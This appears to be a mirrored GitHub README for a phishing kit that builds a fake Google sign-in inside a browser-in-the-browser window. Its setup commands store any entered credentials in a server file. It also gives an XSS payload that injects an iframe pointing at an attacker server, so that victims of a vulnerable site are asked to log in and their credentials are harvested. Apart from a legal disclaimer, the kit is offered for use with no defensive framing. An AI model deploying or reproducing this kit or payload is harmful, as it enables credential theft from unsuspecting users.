GithubHelp home page GithubHelp logo

googlebitb's Introduction

GoogleBITB

This repo contains a fake two-part Google Login implemented within a Browser-In-The-Browser attack window. It can be used on a web server that supports PHP files. Any entered credentials are saved in /opt/GoogleBITB/creds.txt. The Domain Suffix can be changed from @client.com to any site of your choosing (to do this, just edit line 21 of login_page.html). Follow steps below for a quick and easy setup.

Email Page

Legal Disclaimer: Usage of this repo for attacking targets without prior consent is illegal. It is the end user's responsiblity to obey applicable local, state and federal laws. Developer assumes no liability for any misuse or damage caused by this repo.

Get Started

Run the below commands in the /var/www/html folder of your web server.

git clone https://github.com/jakedmurphy1/GoogleBITB.git
cd GoogleBITB
chmod 666 creds.txt

Move the credentials file into a non-public folder:

mkdir /opt/GoogleBITB && mv creds.txt /opt/GoogleBITB/creds.txt

Then visit /GoogleBITB/index.html in your browser and give it a try! Any gathered credentials will be stored in /opt/GoogleBITB/creds.txt

Getting Creds from a XSS Attack

You can use this repo to steal credentials through a XSS attack. Just set it up and use the following XSS payload:

"><iframe style='border:none;width:100%;height:100%' scrolling='no' src='https://[ATTACKER_SERVER]/GoogleBITB/index.html'/>

Be sure to have HTTPS on your server or the iframe will not render.

This payload will create a frame within frame (inception) prompting the user to sign in from what appears to be the vulnerable application.

Sources

https://github.com/jakedmurphy1/GooglePhishing

https://github.com/mrd0x/BITB

googlebitb's People

Contributors

jakedmurphy1 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.